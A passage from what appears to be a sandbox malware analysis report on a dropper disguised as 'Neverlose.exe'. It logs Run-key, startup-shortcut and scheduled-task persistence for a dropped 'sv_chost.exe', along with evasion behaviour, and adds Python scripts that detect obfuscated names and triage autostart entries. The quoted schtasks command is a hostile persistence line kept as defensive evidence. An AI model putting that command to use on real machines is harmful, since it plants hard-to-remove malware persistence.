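    '_8YmVh1FhqE6WBC39aVR1v8sUmJmjJ3oR5kLT3uoZFvTCxKVOX3S4L6rw8iGqkMrheFxdYCWh8SC4Ri8qgV2NlkrWTWHmY',
    'WJ9Ilb8WZtm4dcpxmii76VNMgm0VSFxEfym5TAyNrulmyZGN6UHNN5tdhhVJPj0KY53lSQBTzlJEQgCrAeXxXR0sD8tvI',
    'bPY3VKC7hCUncfFuSChDTAo6zUo7JtfRfk5JUmQEJYxLSHU0HdS3MDBy6oOXGdIb6mLW47lYGYBlutT24KGw3pgrTe5V8',
    'bUzlZdvTPOO0W5unfSl8GVKgBoAl9e6vBv0j57lKM4Hy84L9Am5u1ovnbJrhzZJHffqeikF1JOD00uCYZUr0CRKRrT3Hs',
    'syRWe5KmsTdoPh058MzXXhs8Q2bSKwiAjaibQmmTaqM4CvqiOx2ZSJwmU55NyeFrXBprlOwsmsErXlfabM43VtzPOcogG',
    'E7PHFRwMBYzt2AJjaqXkACO1EaoJ5H15wT25EfsEZawy84TyYDjrvHPvR3Uj6DKCcFwA4fEp1g0K4hpznNlKtUGIqOegp',
]
# Copied from the report: the sv_chost.exe class that keeps its inherited names
# (YkmDGDOksHr5qrnsfF4B2F4yTHPN8Jh3v2Y5xPFK1ucmal0ibb0PwQ2xw1gyde4c6.cs).
MIXED = [
    'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__',
    'kEIRhyaOG6W7qjuLq4LO1JMrwQMvzpv7aBvNkd2N7gYLrFxgYV4vfwY0DOCeqwXfuqAuMzOeDGC',
    'QENxfIInhQRjLWxrm4RQ6lFWuMNo006mvnz2mewQA1IgthDBYwBqq9YW2tSMJ8L7haMhmVC0L5h',
    'Q8M1YYpFKjomgnimRPqiovTyJncNoDj8xmyzwwel1aPdHCj98KvrRLayALB0',
    '_7r3jC0HfqMCJNMMkhzZTNQVzUYF77xCqgzGXb6oSvai9OMItNLBCLe5pW7kN',
]
# Constructed benign class for comparison: ordinary hand-written .NET method names.
BENIGN = ['Equals', 'GetHashCode', 'GetType', 'ToString', 'Dispose',
          'Initialize', 'Main', 'Connect', 'Send', 'Receive']


def shannon_entropy(text: str) -> float:
    """Empirical Shannon entropy in bits per character."""
    if not text:
        return 0.0
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values())


def looks_generated(name: str) -> bool:
    """Shape check that complements the entropy score: a long name mixing digits,
    lower case and upper case. The leading underscore is ignored on the assumption
    that the decompiler added it to identifiers that start with a digit."""
    core = name.lstrip('_')
    return (len(core) >= 20
            and any(ch.isdigit() for ch in core)
            and any(ch.islower() for ch in core)
            and any(ch.isupper() for ch in core))


def assess_class(method_names: list) -> dict:
    """Approximate the report's detection: concatenate the names, measure entropy,
    flag when enough text is present and the score clears the threshold."""
    joined = ''.join(method_names)
    entropy = shannon_entropy(joined)
    generated = sum(looks_generated(n) for n in method_names)
    return {
        'chars': len(joined),
        'entropy': round(entropy, 3),
        'generated_fraction': round(generated / len(method_names), 2) if method_names else 0.0,
        'flagged': len(joined) >= MIN_CHARS and entropy >= ENTROPY_THRESHOLD,
    }


if __name__ == '__main__':
    for label, names in (('obfuscated', OBFUSCATED), ('mixed', MIXED), ('benign', BENIGN)):
        print(label, assess_class(names))
```

The shape check is the cheap second opinion: a class that inherits a handful of framework method names but whose own methods are all 20-plus-character alphanumeric strings is generated code, whatever the entropy rounds to.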
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exe: File created: C:\Users\user\AppData\Roaming\sv_chost.exe
                  Source: C:\Users\user\Desktop\Neverlose.exe: File created: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                  Source: C:\Users\user\Desktop\Neverlose.exe: File created: C:\Users\user\AppData\Local\Temp\Solara.exe

                  Boot Survival

                  Source: C:\Users\user\AppData\Local\Temp\Solara.exe: Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, value name sv_chost (reported 3 times)
                  Source: C:\Users\user\Desktop\Neverlose.exe: Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, value name Solara (reported 3 times)
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exe: Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "sv_chost" /tr "C:\Users\user\AppData\Roaming\sv_chost.exe"
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exe: File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sv_chost.lnk (reported 2 times)
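The entries above describe three overlapping autostart mechanisms: HKCU Run values for both the first-stage Solara.exe and the dropped sv_chost.exe, a scheduled task that relaunches sv_chost.exe every minute with /RL HIGHEST, and a Startup-folder shortcut. The Python below is an added example for this page, not part of the report: it applies the checks a triage analyst would run over these artefacts (autostart target in a user-writable directory, which is the condition behind the Run-key Sigma rule; a minute-granularity task acting as a watchdog; a task or value name that imitates svchost.exe) to the schtasks command line quoted above and to constructed entries. The Run-key value data and the shortcut target are assumptions inferred from the dropped-file paths; the report prints only the value names and the .lnk path.

```python
"""Added example: triage of the Boot Survival artefacts listed above (Run-key values,
the schtasks command line, the Startup-folder shortcut). Pure string analysis, so it
runs on any platform; it is not part of the sandbox report."""
import re
import shlex

# Directories a standard user can write to. An autostart target in one of them is the
# condition behind rules of the 'Run key pointing to suspicious folder' kind.
USER_WRITABLE = re.compile(
    r"\\appdata\\(local\\temp|roaming)\\|\\users\\public\\|\\desktop\\|\\downloads\\|"
    r"\\programdata\\|%(temp|tmp|appdata|localappdata|userprofile)%",
    re.IGNORECASE,
)

# Windows binaries whose names malware persistence commonly imitates (assumed list).
SYSTEM_NAMES = {'svchost', 'csrss', 'lsass', 'winlogon', 'explorer', 'conhost', 'dllhost'}

# Command line quoted verbatim from the report above.
SCHTASKS_CMD = (r'"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 '
                r'/tn "sv_chost" /tr "C:\Users\user\AppData\Roaming\sv_chost.exe"')
# Constructed benign task for contrast.
BENIGN_CMD = r'schtasks.exe /create /sc daily /st 02:00 /tn "VendorBackup" /tr "C:\Program Files\Vendor\backup.exe"'
# Run-key value names are from the report; the target paths are assumed from the
# dropped-file locations (the report does not print the value data).
RUN_KEYS = {
    'Solara': r'C:\Users\user\AppData\Local\Temp\Solara.exe',
    'sv_chost': r'C:\Users\user\AppData\Roaming\sv_chost.exe',
}
# Shortcut name is from the report; its target is assumed.
STARTUP_LNK = ('sv_chost.lnk', r'C:\Users\user\AppData\Roaming\sv_chost.exe')


def in_user_writable(path: str) -> bool:
    return bool(USER_WRITABLE.search(path))


def normalise_name(name: str) -> str:
    """'sv_chost.lnk' -> 'svchost': drop the extension and every non-letter."""
    stem = re.sub(r'\.(exe|dll|lnk)$', '', name.lower())
    return re.sub(r'[^a-z]', '', stem)


def lookalike(name: str) -> bool:
    return normalise_name(name) in SYSTEM_NAMES


def parse_schtasks(cmdline: str) -> dict:
    """Map schtasks switches to their values; a switch without a value maps to True.
    posix=False keeps Windows backslashes intact; the quotes are stripped afterwards."""
    tokens = [t.strip('"') for t in shlex.split(cmdline, posix=False)]
    opts, i = {}, 1                      # tokens[0] is the executable
    while i < len(tokens):
        if tokens[i].startswith('/'):
            key = tokens[i][1:].lower()
            has_value = i + 1 < len(tokens) and not tokens[i + 1].startswith('/')
            opts[key] = tokens[i + 1] if has_value else True
            i += 2 if has_value else 1
        else:
            i += 1
    return opts


def triage_schtasks(cmdline: str) -> list:
    opts = parse_schtasks(cmdline)
    findings = []
    if 'create' not in opts:
        return findings
    modifier = str(opts.get('mo', '1'))
    if str(opts.get('sc', '')).lower() == 'minute' and modifier.isdigit() and int(modifier) <= 5:
        findings.append(f'task re-runs every {modifier} minute(s): a watchdog that relaunches the payload')
    if str(opts.get('rl', '')).upper() == 'HIGHEST':
        findings.append('/RL HIGHEST: requests the highest privilege level available to the account')
    if 'f' in opts:
        findings.append('/f: silently replaces any existing task with the same name')
    target = str(opts.get('tr', ''))
    if in_user_writable(target):
        findings.append(f'task action lives in a user-writable directory: {target}')
    task_name = str(opts.get('tn', ''))
    if lookalike(task_name):
        findings.append(f"task name '{task_name}' imitates system binary '{normalise_name(task_name)}'")
    return findings


def triage_autostart(kind: str, name: str, target: str) -> list:
    """Checks shared by Run-key values and Startup-folder shortcuts."""
    findings = []
    if in_user_writable(target):
        findings.append(f"{kind} '{name}' launches from a user-writable directory: {target}")
    if lookalike(name):
        findings.append(f"{kind} '{name}' imitates system binary '{normalise_name(name)}'")
    return findings


def triage_report() -> list:
    """Run every check over the artefacts from this report section."""
    findings = triage_schtasks(SCHTASKS_CMD)
    for name, target in RUN_KEYS.items():
        findings += triage_autostart('Run value', name, target)
    findings += triage_autostart('Startup shortcut', *STARTUP_LNK)
    return findings


if __name__ == '__main__':
    for line in triage_report():
        print('-', line)
```

Cleanup has to remove all three mechanisms in one pass: deleting sv_chost.exe while the minute task still exists only produces a stream of failed task launches, and deleting the task while the Run value remains brings the payload back at next logon.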

                  Hooking and other Techniques for Hiding and Protection

                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe: File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (reported 4 times)
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe: File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (reported 3 times)
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe: File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (reported 16 times)
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe: File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (reported 12 times)
                  Only the module manifests are opened; no BitLocker cmdlet invocation is recorded in this section. Reading every manifest on the module path is what PowerShell does during command discovery when a cmdlet from a not-yet-loaded module is resolved, so these entries are consistent with module auto-loading rather than with BitLocker use.
                  Source: C:\Users\user\Desktop\Neverlose.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Neverlose.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Neverlose.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Neverlose.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Neverlose.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Neverlose.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Neverlose.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Neverlose.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Neverlose.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Neverlose.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Neverlose.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Neverlose.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Neverlose.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Neverlose.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Neverlose.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Neverlose.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Neverlose.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Neverlose.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Neverlose.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Neverlose.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  Source: C:\Users\user\AppData\Local\Temp\Solara.exe  WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\Neverlose.exe  Memory allocated: 2E70000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\Neverlose.exe  Memory allocated: 3920000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\Neverlose.exe  Memory allocated: 5920000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exe  Memory allocated: 13E0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exe  Memory allocated: 1B0D0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe  Memory allocated: 1120000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe  Memory allocated: 2DC0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exe  Memory allocated: E20000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exe  Memory allocated: 1A9F0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exe  Memory allocated: D60000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exe  Memory allocated: 1A8E0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exe  Memory allocated: 1240000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exe  Memory allocated: 1AE80000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exe  Memory allocated: 730000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exe  Memory allocated: 1A580000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exe  Memory allocated: BF0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exe  Memory allocated: 1A920000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\Neverlose.exe  Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Thread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exe  Thread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe  Thread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe  Thread delayed: delay time: 600000
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe  Thread delayed: delay time: 599891
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe  Thread delayed: delay time: 599766
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe  Thread delayed: delay time: 599657
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe  Thread delayed: delay time: 599532
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe  Thread delayed: delay time: 599422
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe  Thread delayed: delay time: 599312
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe  Thread delayed: delay time: 599203
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe  Thread delayed: delay time: 599091
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe  Thread delayed: delay time: 598970
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe  Thread delayed: delay time: 598844
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe  Thread delayed: delay time: 598730
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe  Thread delayed: delay time: 598616
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe  Thread delayed: delay time: 598495
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe  Thread delayed: delay time: 598351
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe  Thread delayed: delay time: 598168
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe  Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Thread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exe  Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Thread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exe  Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 7046
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 2756
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exe  Window / User API: threadDelayed 8917
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exe  Window / User API: threadDelayed 906
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe  Window / User API: threadDelayed 828
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe  Window / User API: threadDelayed 1768
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 4423
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 5338
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 6457
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 3269
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 3519
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 6196
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 2460
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 7028
                  Source: C:\Users\user\Desktop\Neverlose.exe TID: 2740  Thread sleep count: 73 > 30
                  Source: C:\Users\user\Desktop\Neverlose.exe TID: 2664  Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6660  Thread sleep time: -7378697629483816s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exe TID: 7560  Thread sleep time: -37815825351104557s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7328  Thread sleep time: -10145709240540247s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7328  Thread sleep time: -600000s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7328  Thread sleep time: -599891s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7328  Thread sleep time: -599766s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7328  Thread sleep time: -599657s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7328  Thread sleep time: -599532s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7328  Thread sleep time: -599422s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7328  Thread sleep time: -599312s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7328  Thread sleep time: -599203s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7328  Thread sleep time: -599091s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7328  Thread sleep time: -598970s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7328  Thread sleep time: -598844s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7328  Thread sleep time: -598730s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7328  Thread sleep time: -598616s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7328  Thread sleep time: -598495s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7328  Thread sleep time: -598351s >= -30000s
